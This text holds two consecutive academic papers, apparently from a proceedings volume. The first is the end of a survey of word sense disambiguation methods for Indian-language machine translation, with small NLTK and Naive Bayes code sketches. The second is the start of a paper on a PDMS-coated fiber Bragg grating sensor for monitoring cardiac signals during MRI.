contained in a list and for selecting the most appropriate word from the entire list of
possible words.
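As a small illustration of the supervised POS disambiguation we are targeting, the sketch below uses NLTK's pre-trained perceptron tagger to label "leaves" in the two example sentences; the library, resource names, and expected tags are assumptions about a standard NLTK setup and are not part of our English-to-Sanskrit system.

# Hypothetical sketch: a pre-trained POS tagger resolving the noun/verb ambiguity of "leaves".
# Assumes NLTK with the 'punkt' and 'averaged_perceptron_tagger' resources installed.
import nltk

for sentence in ["Train leaves at two pm.", "Leaves are falling from the tree."]:
    tokens = nltk.word_tokenize(sentence)
    tags = dict(nltk.pos_tag(tokens))          # supervised, corpus-trained tagger
    tag = tags.get("leaves", tags.get("Leaves"))
    print(sentence, "->", tag)                 # roughly expected: VBZ (verb) vs NNS (noun)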

5 WSD Approaches

There are several approaches to WSD, but mainly three, and they depend on
the availability of the dataset. These approaches are shown in Fig. 4.

5.1 An Approach Focused on Information

This approach is based on several sources of knowledge, such as machine-readable
dictionaries, thesauri, sense inventories, etc. The most commonly used dictionary in this
research field is WordNet [21]. The following knowledge-based methods are commonly used.
(a) Lesk Algorithm: The Lesk algorithm is a dictionary-based method
introduced by Michael Lesk in 1986 [22, 23]. It identifies the correct sense one word
at a time by determining, through gloss overlap, which dictionary definitions of the
words in the context share the most words. The simplified variant runs faster, which
reduces the computational time complexity; a small sketch of this gloss-overlap idea is
given at the end of this subsection.
(b) Semantic Similarity: This approach belongs to the knowledge-based methods
and is used to resolve the WSD problem. The algorithm defines the relationship
between words [14]. Semantic similarity can be used to quantify ambiguity,
as well as to check patterns for continuity and coherence [24]. Information
content, feature-based, path-length, and hybrid measures are the four categories
that all such measures fall under.

Fig. 4 Disambiguation of word senses: various approaches (WSD)



(c) Selectional Preferences: This method is used to find information regarding
the potential relationships between different categories of words and assigns
the common sense on the basis of this source of information. These preferences
are given in terms of semantic classes instead of single words.
(d) Heuristic Method: This method comes under the knowledge-based methods.
Linguistic properties are used to determine the correct meaning of an ambiguous
expression. Three heuristics are used as baselines for WSD systems.
Most Frequent Sense searches all possible meanings of a given ambiguous
expression; a word's most frequent sense (MFS) can be measured in a variety
of ways, and WordNet provides a frequency count for each of a word's senses.
One Sense per Discourse says that a word's meaning is preserved through
all its occurrences in a given text; it has an effect on classification likelihood,
and it can be overridden if there is good local evidence. One Sense per
Collocation is similar to the One Sense per Discourse estimate,
except that it assumes that nearby words offer stronger and clearer
signals about the sense of the word.
(e) Walker's Algorithm: This algorithm is based on a thesaurus. It works by
finding the synonyms of the ambiguous word and calculating a score for each sense,
adding 1 whenever the meaning of a synonym matches the context. The sense with the
highest score is chosen, since the method relies on synonyms.
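To make the gloss-overlap idea behind the Lesk algorithm concrete, a minimal sketch of simplified Lesk using NLTK's WordNet interface is given below; it is an illustrative simplification (no stop-word removal or stemming), not the original 1986 procedure, and it assumes the NLTK 'wordnet' corpus has been downloaded.

# Minimal simplified-Lesk sketch: choose the sense whose gloss overlaps most with the context.
from nltk.corpus import wordnet as wn

def simplified_lesk(word, context_sentence):
    context = set(context_sentence.lower().split())
    best_sense, best_overlap = None, -1
    for sense in wn.synsets(word):
        gloss = set(sense.definition().lower().split())
        for example in sense.examples():           # include usage examples in the gloss bag
            gloss |= set(example.lower().split())
        overlap = len(gloss & context)              # shared words between gloss and context
        if overlap > best_overlap:
            best_sense, best_overlap = sense, overlap
    return best_sense

print(simplified_lesk("bank", "he sat on the bank of the river and watched the water"))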

5.2 Supervised-Learning Approach

This approach is applied in WSD systems that use machine learning techniques to
learn from manually generated sense-annotated data. A classifier learned from the
training set is then used to label the target words; the sense tags of the target words
in the training data are generated manually using the dictionary. In contrast to the other
methods, this one shows the best results. This approach uses the following methods:
(a) Decision List: A decision list is a list created from "if-then-else" rules [25–
27]. Training sets are used to generate parameters such as feature values, senses,
and scores. The final order of the rules is generated on the basis of decreasing score,
which results in the creation of the decision list. First, the occurrences
of a word are calculated, and its feature vector is used for the creation of the decision list.
An example of a decision list for deciding whether a person is eligible for blood donation is:

If age > 18 and weight > 50
then
    the person is eligible for blood donation
else
    the person is not eligible for blood donation.

Fig. 5 Decision tree example

(b) Decision Tree: A decision tree is a visual representation for the outcomes of
a sequence of connected choices. It allows a person to compare and contrast
potential actions using a yes–no tree based on their various characteristics such
as costs, probabilities, and benefits. The representation of classification rules
is achieved using a decision tree [28–30], and these rules recursively partition
the training data set.
Figure 5 shows an example of a decision tree used to determine a person’s
eligibility for blood donation.

(c) Naïve Bayes: This is a classification methodology based on Bayes' theorem,
which assumes that the presence of one feature in a class has no bearing on
the presence of any other feature in that class. Bayes' rule is used in this
algorithm to find the conditional probability of the features in a given class [31–33].
The conditional probability of each sense of a word, given the features of its context,
is calculated using this algorithm; the sense with the highest value in that context is
taken as the most appropriate meaning. A small numerical sketch of Eq. (3) is given
at the end of this subsection.

The probability value P can be computed with the help of the following formulas:

S = \arg\max_{S_i \in \mathrm{Senses}_D(w)} P(S_i \mid f_1, f_2, \ldots, f_x)  (1)

S = \arg\max_{S_i \in \mathrm{Senses}_D(w)} \frac{P(f_1, f_2, \ldots, f_x \mid S_i)\, P(S_i)}{P(f_1, f_2, \ldots, f_x)}  (2)

S = \arg\max_{S_i \in \mathrm{Senses}_D(w)} P(S_i) \prod_{j=1}^{m} P(f_j \mid S_i)  (3)

where S_i is a sense of the word w, f_j is a given feature, and x is the total number of
extracted features.
This model is simple to use, and implement, especially with large data sets.
(d) Neural Networks: Artificial neurons are used to process data in this model
[34–37]. The training data set is partitioned into non-overlapping sets using
this approach, with inputs in the form of pairs of features, and the connection
weights obtained from the new pairs are adjusted to get the desired performance.
Words are interpreted as nodes in the neural network, and these nodes activate
semantically linked concepts.
The following formula [38] can be used to calculate the input of the general
artificial neural network model:

y_{in} = x_1 w_1 + x_2 w_2 + \cdots + x_m w_m  (4)

i.e., the total input

y_{in} = \sum_{i=1}^{m} x_i w_i  (5)

The output can be determined by applying the activation function to the total
input value:

y = F(y_{in})  (6)

(e) Example-Based Learning: All training examples are stored in memory, and new
examples are added to the model; the description of this memory is then used
for classification. In this model, the k-nearest neighbor (KNN) method is widely
used. The KNN algorithm uses feature similarity to predict the values of new data
points, and each new data point is assigned a value on the basis of how
closely it is related to the points in the training set.
(f) Support Vector Machine (SVM): The SVM-based methodology is
built on the statistical learning theory concept of structural risk
minimization. The main objective of this strategy is to separate positive and
negative examples with the largest possible margin, where the margin is defined as the
distance between the hyperplane and the nearest positive or negative example. The
examples of both kinds that lie closest to the hyperplane are called
support vectors.
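As a concrete numerical illustration of Eq. (3), the sketch below scores two hypothetical senses of "leaves" with made-up prior and likelihood values; the probabilities are purely illustrative and are not taken from any corpus.

# Hypothetical sketch of the Naive Bayes sense scoring in Eq. (3), using made-up probabilities.
import math

def best_sense(senses, prior, likelihood, features):
    # Return the sense maximizing log P(S_i) + sum_j log P(f_j | S_i).
    scores = {s: math.log(prior[s]) + sum(math.log(likelihood[s].get(f, 1e-6)) for f in features)
              for s in senses}
    return max(scores, key=scores.get)

senses = ["leaves/noun", "leaves/verb"]
prior = {"leaves/noun": 0.5, "leaves/verb": 0.5}
likelihood = {
    "leaves/noun": {"tree": 0.30, "falling": 0.20, "train": 0.01},
    "leaves/verb": {"tree": 0.02, "falling": 0.02, "train": 0.40},
}
print(best_sense(senses, prior, likelihood, ["train", "falling"]))  # -> leaves/verb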

5.3 Unsupervised-Learning Approach

According to [39], this approach does not necessarily require a training corpus or
considerable computation time. Using this approach, unlabeled data can be obtained
easily. The following three approaches come under this category:
(a) Context Clustering: This method depends on grouping techniques, and
the groups are formed on the basis of a similarity matrix or context vectors.
These groups, called clusters, are used to determine
the meaning of a word. This technique can be applied when there is no class
to be predicted but the inputs can be divided into natural groups.
(b) Word Clustering: In this technique, words are clustered together on the basis
of their semantic similarity, which can be calculated from the features they share.
Highly similar words in a category have the same sort of characteristics, and applying
the clustering algorithm then allows the distinction between senses to be determined.
(c) Co-occurrence Graph: This method is graph-based. A virtual graph of
vectors is created after the polysemous words are found from the result of sentence
processing. The graph nodes help to calculate the similarity; a consistent value can
then be determined from these measurements, and the sense label can be assigned
on the basis of the context.

6 WSD Approaches in Context to WSD

After the detailed study of WSD approaches, we present a summary of the benefits
and drawbacks of the different types of algorithms in Table 2.

7 Literature Analysis on Various WSD Methods


for Languages of India

Numerous works have been carried out to implement disambiguation methods
for English and other European languages, but due to the lack of resources such as
machine-readable dictionaries and knowledge sources, less work has been done for Indian
languages. Such resources are needed for WSD algorithms. The literature review of the
work carried out for various Indian languages is presented here in the form of a
comparative analysis. Table 3 contains a detailed analysis of several WSD algorithms
applied to several Indian languages by various researchers, with reference to their result
accuracy.

8 Conclusion

Due to the complexity of the words in a given language and the dependence on
unstructured sources, disambiguation, i.e., capturing the precise meaning of words in
a particular document, is a difficult task. We have included a thorough analysis of the
advantages and disadvantages of different approaches to word sense disambiguation (WSD)
in this manuscript. We also discussed the different methods used by researchers in
Indian-language machine translation research, as well as the accuracy of their findings.
We came to the conclusion that there are three methodologies: supervised, unsupervised,
and knowledge-based, with the supervised approach providing the best
performance.
Finally, we arrive at the determination that a specific system may give a high degree
of precision for one language but a low degree for another; the characteristics of the
data set used influence the performance of the applied algorithm; some of
these techniques run quickly but with accuracy constraints; and
the vast majority of these strategies have been implemented successfully for several languages.
In our research work, we will apply supervised learning methods to disambiguate
the part-of-speech ambiguity in the source language, i.e., English, during
machine translation from English to Sanskrit. We are focusing on translating
documents from the source language, i.e., English, into the target language, i.e., Sanskrit,
with the maximum success rate.

References

1. Bahadur, P., & Chauhan, D. S. (2014). Machine translation—A journey. In 2014 Science and
information conference (pp. 187–195). IEEE.
2. Dayal, V. (2004). The universal force of free choice any linguistic variation yearbook 4,
15–40. Retrieved from http//www.ingentaconnect.com; Cruse, D. (1986). Lexical semantics.
Introducing lexical relations. Cambridge: Cambridge University Press.
3. Cruse, D. (1986). Lexical semantics. Introducing lexical relations. Cambridge: Cambridge
University Press.
4. Zelta, E. N. (2014). Ambiguity. In Stanford encyclopedia of philosophy. Retrieved from http://
plato.stanford.edu; Navigli, R. (2009). Word sense disambiguation: A survey. ACM Computing
Surveys (CSUR), 10.
5. Navigli, R. (2009). Word sense disambiguation: A survey. ACM Computing Surveys (CSUR),
41(2), 1–69.
6. Lin, D., and Pantel, P. (2002). Discovering word senses from text. In ACM
7. Ranjan Pal, A., & Saha, D. (2015). Word sense disambiguation: A survey. International Journal
of Control Theory and Computer Modeling, 5(3), 1–16. https://doi.org/10.5121/ijctcm.2015.
5301
8. Haroon, R. P. (2011). Word sense disambiguation-A survey. In Proceedings of the international
colloquiums on computer electronics Electrical Mechanical and Civil, (EMC’ 11), ACEEE (pp
58–60). DOI: 02.CEMC.2011.01.582
9. Niu, C., Li, W., Srihari, R. K., Li, H., & Crist, L. (2004). Context clustering for word sense
disambiguation based on modeling pairwise context similarities. In Proceedings of SENSEVAL-
3, the third international workshop on the evaluation of systems for the semantic analysis of
text (pp. 187–190).
10. Le, C. A., & Shimazu, A. (2004). High WSD accuracy using Naive Bayesian classifier with
rich features. In Proceedings of the 18th Pacific Asia conference on language, information and
computation (pp. 105–114).
11. Saktel, P., & Shrawankar, U. (2013). An improved approach for word ambiguity removal. arXiv
preprint arXiv:1304.7282.
12. Sheth, M., Popat, S., & Vyas, T. (2016). Word sense disambiguation for Indian languages. In
International conference on emerging research in computing, information, communication and
applications (pp. 583–593). Springer, Singapore.
13. Chaplot, D. S., & Salakhutdinov, R. (2018). Knowledge-based word sense disambiguation
using topic models. In Proceedings of the AAAI conference on artificial intelligence (Vol. 32,
No. 1).

14. Aliwy, A. H., & Taher, H. A. (2019). Word sense disambiguation: Survey study. Journal of
Computer Science. Accepted July 2019, Iraq.
15. Wang, Y., Wang, M., & Fujita, H. (2020). Word sense disambiguation: A comprehensive
knowledge exploitation framework. Knowledge-Based Systems, 190, 105030.
16. Alzubi, O. A., Alzubi, J. A., Alweshah, M., Qiqieh, I., Al-Shami, S., & Ramachandran,
M. (2020). An optimal pruning algorithm of classifier ensembles: Dynamic programming
approach. Neural Computing and Applications, 32(20), 16091–16107.
17. Gaudard, L., & Romerio, F. (2020). A conceptual framework to classify and manage risk,
uncertainty and ambiguity: An application to energy policy. Energies, 13(6), 1422.
18. Scarlini, B., Pasini, T., & Navigli, R. (2020). SensEmBERT: Context-enhanced sense embed-
dings for multilingual word sense disambiguation. In Proceedings of the AAAI conference on
artificial intelligence (Vol. 34, No. 05, pp. 8758–8765).
19. Scarlini, B., Pasini, T., & Navigli, R. (2020). With more contexts comes better performance:
Contextualized sense embeddings for all-round word sense disambiguation. In Proceedings
of the 2020 conference on Empirical Methods in Natural Language Processing (EMNLP)
(pp. 3528–3539).
20. Bahadur, P. (2013). English to Sanskrit machine translation-EtranS system. International
Journal of Computer Applications & Information Technology, 3(II) (ISSN: 2278–7720).
21. Banerjee, S., and Pedersen, T. (2002). An adapted Lesk algorithm for word sense disambigua-
tion using WordNet. In Proceedings of the third international conference on intelligent text
processing and computational linguistics, Mexico City, February.
22. Lesk, M. (1986). Automatic sense disambiguation using machine readable dictionaries: How
to tell a pine cone from an ice cream cone. In Proceedings of SIGDOC.
23. Jiang, J. J., & Conrath, D. W. (1997). Semantic similarity based on corpus statistics and lexical
taxonomy. In Proceedings of the 10th research on computational linguistics international
conference (pp. 19–33) 5–7 Aug, Taipei, Taiwan.
24. http://link.springer.com/article/10.1023/A%3A1002674829964#page-1
25. Parameswarappa, S., & Narayana, V. N. (2013). Kannada word sense disambiguation using
decision list. 2(3), 272–278
26. http://www.academia.edu/5135515/Decision_List_Algorithm_for_WSD_for_Telugu_NLP
27. Singh, R. L., Ghosh, K., Nongmeikapam, K., & Bandyopadhyay, S. (2014). A decision tree
based word sense disambiguation system in Manipuri language. Advanced Computing: An
International Journal (ACIJ), 5(4), 17–22.
28. http://wing.comp.nus.edu.sg/publications/theses/2011/low_wee_urop.pdf
29. http://www.d.umn.edu/~tpederse/Pubs/naacl01.pdf
30. Le, C. A., & Shimazu, A. (2004). High WSD accuracy using Naive Bayesian classifier with
rich features. In PACLIC 18 (pp. 105–114), 8th–10th Dec 2004, Waseda University, Tokyo.
31. http://www.cs.upc.edu/~escudero/wsd/00-ecai.pdf
32. Aung, N. T. T., Soe, K. M., & Thein, N. L. (2011). A word sense disambiguation system
using Naïve Bayesian algorithm for Myanmar language. International Journal of Scientific &
Engineering Research, 2(9), 1–7.
33. http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.13.9418&rep=rep1&type=pdf
34. http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.154.3476&rep=rep1&type=pdf
35. http://www.aclweb.org/anthology/W02-1606
36. http://www.cs.cmu.edu/~maheshj/pubs/joshi+pedersen+maclin.iicai2005.pdf date:
14/05/2015
37. Erkan, G., & Radev, D. (2004). Lexrank: graph based lexical. Artificial Intelligence Research,
22, 457–479.
38. Haroon, R. P. (2010). Malayalam word sense disambiguation. In 2010 IEEE international
conference on computational intelligence and computing research (pp. 1–4). IEEE.
39. Kumar, R., & Khanna, R. (2011). Natural language engineering: The study of word sense
disambiguation in Punjabi. Research Cell: An International Journal of Engineering Sciences,
1, 230–238. ISSN: 2229–6913.

40. Das, A., & Sarkar, S. (2013). Word sense disambiguation in Bengali applied to Bengali-Hindi
machine translation. In Proceedings of the 10th International Conference on Natural Language
Processing (ICON), Noida, India.
41. Parameswarappa, S., Narayana, V. N., & Yarowsky, D. (2013). Kannada word sense disam-
biguation using decision list. International Journal of Emerging Trends & Technology in
Computer Science (IJETTCS), 2(3), 272–278.
42. Kumari, S., & Singh, P. (2013). Optimized word sense disambiguation in Hindi using genetic
algorithm. International Journal of Research in Computrer & Communication Technology,
2(7), 445–449.
43. Anand Kumar, M., Rajendran, S., & Soman, K. P. (2014). Tamil word sense disambiguation
using support vector machines with rich features. International Journal of Applied Engineering
Research, 9(20), 7609–7620.
44. Pal, A. R., Saha, D., Naskar, S., & Dash, N. S. (2015). Word sense disambiguation in Bengali:
A lemmatized system increases the accuracy of the result. In 2015 IEEE 2nd international
conference on recent trends in information systems (ReTIS) (pp. 342–346). IEEE.
45. Sankar, K. S., Raj, P. R., & Jayan, V. (2016). Unsupervised approach to word sense
disambiguation in Malayalam. Procedia Technology, 24, 1507–1513.
46. Vaishnav, Z. B. (2017). Gujarati word sense disambiguation using genetic algorithm. Inter-
national Journal on Recent and Innovation Trends in Computing and Communication, 5(6),
635–639.
47. Shashank, N. S., & Kallimani, J. S. (2017). Word sense disambiguation of polysemy
words in kannada language. In 2017 International Conference on Advances in Computing,
Communications and Informatics (ICACCI) (pp. 641–644). IEEE.
48. pal Singh, V., & Kumar, P. (2018). Naive Bayes classifier for word sense disambiguation of
Punjabi language. Malaysian Journal of Computer Science, 31(3).
49. Borah, P. P., Talukdar, G., Baruah, A. (2019) WSD for assamese language. In J. Kalita, V. Balas,
S. Borah, & R. Pradhan (Eds.), Recent developments in machine learning and data analytics.
Advances in intelligent systems and computing (Vol. 740). Springer, Singapore. https://doi.org/
10.1007/978-981-13-1280-9_11
50. Vaishnav, Z. B., & Sajja, P. S. (2019). Knowledge-based approach for word sense disambigua-
tion using genetic algorithm for Gujarati. In Information and communication technology for
intelligent systems (pp. 485–494). Springer, Singapore.
51. pal Singh, V., & Kumar, P. (2020). Word sense disambiguation for Punjabi language using deep
learning techniques. Neural Computing and Applications, 32(8), 2963–2973.
Fiber Bragg Grating (FBG) Sensor
for the Monitoring of Cardiac
Parameters in Healthcare Facilities
Ambarish G. Mohapatra, Pradyumna Kumar Tripathy, Maitri Mohanty,
and Ashish Khanna

Abstract Fiber Bragg grating sensing technology provides a new look to the
healthcare monitoring system due to its spectral encoding capacity, dielectric prop-
erty, sensitivity, inert, nontoxic, resistive to the electromagnetic environment, self-
referencing, and low cost. This article presents a design and construction of an FBG
sensor for the monitoring of cardiac vibrations. A sensor element is designed by
depositing polydimethylsiloxane (PDMS) polymer on the FBG sensing element. The
elastic and thermal property of the sensor element is also discussed in this article.
The stress and strain distribution profile is addressed using finite element analysis
(FEA). Further, the bonding of the FBG sensor element is discussed in this article
with adequate design specifications. In addition to the FBG sensor design consid-
erations, the real-time acquisition of the cardiac signal is also experimented with in
this research work to validate the sensor performance. Finally, the architecture of a
cardiac monitoring approach by utilizing the Internet of things (IoT) and machine
learning (ML) is proposed in this article.

Keywords Fiber Bragg grating · Finite element analysis · Cardiac vibrations · PDMS · IoT · Machine learning

A. G. Mohapatra (B)
Department of Electronics and Instrumentation Engineering, Silicon Institute of Technology,
Bhubaneswar, Odisha, India
P. K. Tripathy
Department of Computer Science & Engineering, Silicon Institute of Technology, Bhubaneswar,
Odisha, India
M. Mohanty
SSC, Puri, Odisha, India
A. Khanna
Maharaja Agrasen Institute of Technology, Delhi, India
e-mail: ashishkhanna@mait.ac.in


1 Introduction

Fiber-optic communication is an emerging technology in the industrial telecommunication sector, remote healthcare applications, and structural monitoring because of its high performance, low cost, large bandwidth, and reliable links. FBG is used as a sensing element in optical sensors for purposes such as biomedical sensing, chemical sensing, and structural health monitoring. These sensors are used to measure strain, temperature, vibration, acceleration, velocity, pressure, and humidity. In a similar context, various research works have been reported to date on the development of biomedical devices and systems using FBG sensors. Further, cardiac monitoring is a critical requirement in MRI environments, where conventional sensors are not permitted. Therefore, FBG sensor-based cardiac parameter sensing is well suited to these applications.
Evaluation of physiological parameters such as heart rate, respiration rate, and ECG is required during MRI for neonatal and pediatric patients, handicapped persons, persons with implanted artificial pacemakers, persons with mental disorders, patients in a coma or under anesthesia, and patients reacting to a contrast medium. Commonly used sensors and equipment cannot be used during MRI to measure respiration rate, heart rate, and ECG because of the strong electromagnetic field inside the MRI machine. These issues can be addressed by combining cutting-edge FBG sensors, polymer engineering, the Internet of things, software engineering, big data, and machine learning into a complete healthcare solution.
This article is organized into five sections to portray the importance of such systems in cardiac monitoring applications. The second section discusses recent advances of FBG sensing technology in various sensing applications, together with a result-based analysis of the corresponding research articles. The third section presents the concept of the FBG sensing scheme with suitable mathematical models and design considerations. The results obtained during the simulation of the proposed sensor element, along with the design considerations, are discussed in the fourth section. The final section draws conclusions from the results obtained with the proposed methodology and is followed by the references.

2 Literature Review

A review on the development of FBG sensing technology for the monitoring of cardiac and respiration parameters is presented in this section.
Koivistoinen et al. present two polypropylene film-based EMFi sensors of size 30 cm × 30 cm used for capturing ballistocardiogram signals [1]. One EMFi sensor is placed at the backrest of a normal chair and the other in the seat. Better signals are captured from under the subject than from behind the back; the signal measured behind the subject's back fluctuates due to the movement of the chest

during respiration. In a similar context, Dziuda et al. describe signals obtained from an FBG strain sensor, mounted on a polymethyl-based plate, placed inside a bed mattress. A moving average filter is used to obtain RR and HR [2]. The sensor signal is affected by the motion of the chest and is also influenced by the body position, coughing, and displacement of the bed. FBG sensors are passive sensors suitable for various critical applications [3]. The total error of the system is less than 8. Similarly, Fajkus et al. describe a non-invasive probe based on two FBGs encapsulated inside polydimethylsiloxane (PDMS) and observed that the polymer increases the sensitivity of the probe four times. A wavelength-division technique based on the spectral separation of the individual gratings is used to measure RR, HR, and body temperature [4]. The relative error is 3.9% for RR and 0.36% for body temperature. Dziuda et al. present an FBG written on an optical fiber placed inside a pneumatic cushion; a Fabry–Perot filter is used to analyze the FBG signals and detect HR and RR in the sensing interrogation scheme [5]. Breathing induces a dynamic strain of about 24.8 µε on the FBG, and the heartbeat about 8.3 µε. The sensor gives a maximum relative error of 14%. Dziuda et al. also describe an FBG sensor placed inside a pneumatic cushion, where a moving average method is used to detect HR and RR after filtering the FBG signal with a Fabry–Perot spectrally scanning filter [6]. A strain of 0–12.4 µε is induced on the FBG sensing element by breathing and about 8.3 µε by the heartbeat. The maximum relative error for the sensor is 12%.
Wo et al. [7] present a pair of FBGs inscribed in an Er-doped fiber; the respiration rate is measured from the variation of the beat signal between the dual polarizations of the packaged fiber laser. De Jonckheere presents an FBG-based smart textile that undergoes an elongation of 0.1–5% during breathing, and a spectroscopic technique with an optical spectrum analyzer (OSA) is used to detect HR and RR [8]. Wehrle presents an FBG strain sensor placed inside a belt, where a fixed filter with an OSA is used to detect the respiratory frequency spectrum and ventilator movement. Silva describes a single FBG sensor embedded in a polymeric foil to detect RR and HR [9]; a bilinear technique with two bandpass filters is applied in the digital domain [10]. Elsarnagawy describes an FBG sensor embedded into a nylon textile, with two bandpass filters in the ranges 0.1–0.4 Hz for RR and 0.8–1.6 Hz for HR [11]. Dziuda et al. present an FBG sensor adhered to a 95 × 220 × 1.5 mm Plexiglas plate placed inside a bed mattress [12], where a low-pass filter with a cut-off frequency of 60 Hz is used to detect RR and HR. The above review of FBG sensors shows that there is still considerable room for work at the sensor level, i.e., the development of high-precision passive sensing elements.

3 Background

The FBG sensor element works on the principle of light traveling inside the core of the optical fiber. The wavelength of the light reflected by the FBG element shifts with the external strain and temperature applied to the grating region. The fabrication of the FBG sensor element and its basic working principle are discussed in this section.

3.1 The Fabrication Method of FBG

The fabrication of the FBG sensor element for the acquisition of cardiac vibrations is performed by following an experimental procedure in the laboratory. An ultraviolet beam is focused on an optical fiber to inscribe a periodic grating structure in the silica fiber. This produces a periodic change in the refractive index of the photosensitive fiber core, which is called a Bragg grating. The Bragg grating is used as a sensing element, and several gratings can be multiplexed at different points along the optical fiber when designing a sensor. The type of grating depends on the photosensitivity mechanism by which the fringes are produced in the fiber. The working principle of FBG sensing devices is discussed in the next section of the article.

3.1.1 Working Principle of the Sensor

A fiber Bragg grating sensor introduces a periodic modulation of the refractive index along the propagation axis of the optical fiber [13, 14]. This periodic structure acts as a highly wavelength-selective reflection filter. When intense laser light is incident on the sensor, the partial reflections combine into one strong reflection at a wavelength called the Bragg wavelength, and the corresponding condition is called the Bragg condition, as shown in Fig. 1 [15, 16]. According to coupled-mode theory, the Bragg wavelength is given by Eq. 1.

Fig. 1 Reflected wavelength of an FBG sensor



λB = 2 ηeff Λ   (1)

where
ηeff is the effective refractive index of the fiber core, and
Λ is the grating period.
The shift of the reflected wavelength depends on both strain and temperature [17]. Consequently, once the fiber Bragg grating material is chosen for the sensor design, the strain sensitivity coefficient and the temperature sensitivity coefficient are used for sensing [7, 17].
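For reference, the dependence just described is commonly summarized in the FBG literature by the relation below; it is quoted here only as a clarifying standard form, not as a derivation from this article, and the coefficient symbols are the customary ones rather than notation defined by the authors:

ΔλB / λB = (1 − pe) ε + (α + ξ) ΔT

where pe is the effective photo-elastic coefficient, ε the applied axial strain, α the thermal expansion coefficient, ξ the thermo-optic coefficient, and ΔT the temperature change. The first term corresponds to the strain sensitivity coefficient and the second to the temperature sensitivity coefficient mentioned above.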

4 Experiment and Result

The FEA model of the sensor element is designed in the COMSOL Multiphysics software, and the complete structural analysis is performed in the same environment. COMSOL Multiphysics supports the simulation of designs involving coupled physics, mechanics, acoustics, electromagnetics, fluid flow, heat transfer, chemical reactions, etc., as well as the preparation of simple simulation apps.
The following analysis is performed using the COMSOL software.
• Single-physics and arbitrary multiphysics analyses.
• High-performance meshing and numerical analysis.
• Post-processing of the sensor structure.
The different analyses performed on the sensor element are shown in Figs. 2, 3, 4,
and 5. The 3D structure designed using the FEA software is shown in Fig. 2a. The size,
material, and other design considerations used in the FEA model are listed in Tables 1
and 2. Similarly, the 3D meshing of the FEA model is shown in Fig. 2b. Further, the

Fig. 2 3D model and 3D meshing of the polymer layer embedded on the FBG element

Fig. 3 Contour of total displacement and deformation profile along with force direction

Fig. 4 Contour of principal stress profile and fabricated sensor element

Fig. 5 LabVIEW graphical user interface (GUI) for real-time signal acquisition and acquired signal

Table 1 Dimensions of the 3D model

Parameter      Dimension in mm
Length         40
Width          40
Thickness      2

Table 2 Design configurations of the sensor element

Simulation configuration    Parameter
Material                    Polydimethylsiloxane (PDMS)
Applied frequency           0.33 Hz
Acts/min                    20 acts per minute

total deformation of the material layer is evaluated using the FEA simulation, and
the contour of the deformation profile is shown in Fig. 3a. Similarly, the contour of
the total deformation/displacement in the meter is shown in Fig. 3b.
The deformation profile of the PDMS layer shown in Fig. 4a clearly indicates that the deformation is maximum at the center region of the 3D element. The FBG sensor element is therefore bonded to the center region of the PDMS deposition to obtain maximum sensitivity. Figure 4b shows a snapshot of the fabricated sensor element.
The signal recording from the fabricated sensor element is performed using a software application developed on the National Instruments LabVIEW platform. An SLED optical light source is used, and an FBG interrogator receives the reflected wavelength. A LabVIEW application is developed to estimate the peak wavelength from the raw signal recorded by the FBG interrogator. Figure 5a shows the GUI of the application software developed at the laboratory. Further, the fabricated FBG sensor is tested using a similar procedure by fixing it on the chest of a test subject in the laboratory, and the cardiac signal of the test subject is recorded using the LabVIEW application. Figure 5b shows the real-time raw cardiac signal recorded using the fabricated FBG sensor element. It is observed that the recorded signal contains additional noise components and that the P, Q, S, and T waves are largely affected by this noise, whereas the R-wave is clearly visible and can be further analyzed to estimate the useful cardiac parameters of a patient under test.
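The peak-wavelength estimation step mentioned above can be illustrated with a short, self-contained sketch. This is only an illustration of one common centroid-based approach, not the authors' LabVIEW implementation; the file name and the two-column (wavelength, power) layout assumed below are hypothetical.

```python
import numpy as np

def bragg_peak(wavelengths_nm, reflected_power, half_window=5):
    """Estimate the Bragg wavelength as the power-weighted centroid
    of the samples surrounding the strongest reflection peak."""
    wavelengths_nm = np.asarray(wavelengths_nm, dtype=float)
    reflected_power = np.asarray(reflected_power, dtype=float)

    peak_idx = int(np.argmax(reflected_power))          # coarse peak location
    lo = max(peak_idx - half_window, 0)
    hi = min(peak_idx + half_window + 1, len(wavelengths_nm))
    w = reflected_power[lo:hi]
    # The centroid refines the estimate beyond the interrogator's sampling grid
    return float(np.sum(wavelengths_nm[lo:hi] * w) / np.sum(w))

# Hypothetical usage with a CSV log of one interrogator sweep:
# spectrum = np.loadtxt("fbg_spectrum.csv", delimiter=",")
# print("Bragg wavelength:", bragg_peak(spectrum[:, 0], spectrum[:, 1]), "nm")
```

Tracking this peak over successive sweeps would yield a wavelength-shift time series of the kind from which a cardiac signal such as the one in Fig. 5b can be obtained.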

5 Conclusions

The finite element analysis method is used to formulate the design of a fiber Bragg
grating sensor for the real-time acquisition of cardiovascular parameters like heart
rate, respiration rate, oxygen concentration, and chest expansion. It is observed that
the PDMS polymer material is best suitable for the acquisition of the real-time
cardiac signal of the patient under medical examination. The individual responses

of the sensor element are evaluated successfully in the experimental study. The real-time cardiac signal acquired using the fabricated FBG sensor element gives a clear picture of the R-wave of the cardiac signal pattern. The P, Q, S, and T waves can also be estimated from the raw signal using robust signal processing or machine learning techniques. The fabricated sensor element can be used with an Internet of things (IoT) platform for the monitoring of cardiac parameters of a patient under an MRI test.

Acknowledgements The authors thank the Silicon Institute of Technology, Bhubaneswar, and the Central Glass and Ceramic Research Institute (CGCRI), Kolkata, for providing continuous support in fabricating the FBG sensor during the research work. The authors also thank the Silicon Institute of Technology, Bhubaneswar, for providing licensed software such as LabVIEW and COMSOL Multiphysics and the FBG interrogator used to conduct this experiment successfully. We would like to acknowledge the financial support received under the research project grant scheme TEQIP-III Biju Patnaik University of Technology (BPUT) Collaborative Research and Innovation Scheme (CRIS) vide Letter No. BPUT-XIX-TEQIP-III/17/19/119 dated 08/11/2019. This work is a part of the Indian Patent filed vide Ref. No. 202131001862 on 2021/01/14 22:58:13 (IST) under Intellectual Property (IP) India.

References

1. Koivistoinen, T., Junnila, S., Varri, A., & Koobi, T. (2004). A new method for measuring the
ballistocardiogram using EMFi sensors in a normal chair. In The 26th Annual International
Conference of the IEEE Engineering in Medicine and Biology Society (pp. 2026–2029).
2. Dziuda, L., Krej, M., & Skibniewski, F. W. (2013). Fiber Bragg Grating sensor incorporated
to monitor patient vital signs during MRI. IEEE Sensor Journal, 13(12).
3. Paulo Carmo, J., & da Silva, A. M. F. (2012). Application of Fiber Bragg Gratings on wearable
garments. IEEE Sensor Journal, 12(12).
